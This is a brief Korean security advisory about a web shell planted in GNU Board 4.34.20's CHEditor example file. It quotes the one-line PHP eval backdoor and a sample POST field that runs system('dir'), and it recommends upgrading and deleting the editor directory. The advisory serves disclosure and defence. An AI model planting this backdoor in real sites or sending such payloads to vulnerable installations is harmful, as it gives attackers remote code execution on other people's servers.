GNU Board 그누보드 4.34.20 버젼 웹셀 삽입 취약점

GNU Board 그누보드 4.34.20 버젼 웹셀 삽입 취약점

 

/cheditor4/example/textarea.html 파일내 삽입

 

<?php @eval ($_POST[cheditor]); ?>

 

공격자는 cheditor 변수에 POST 메소드를 전송하여 임의의 PHP 코드 실행 가능 (아래 참조)

 

name='cheditor' value="system('dir');">

 

 

해결책 : 그누보드 4.34.24 이상으로 업그레이드후 CHEditor4 디렉토리 삭제

 - 최신 그누보드 설치디렉토리는 /cheditor4

gnuboard-4.34.20-webshell_report_20120509.pdf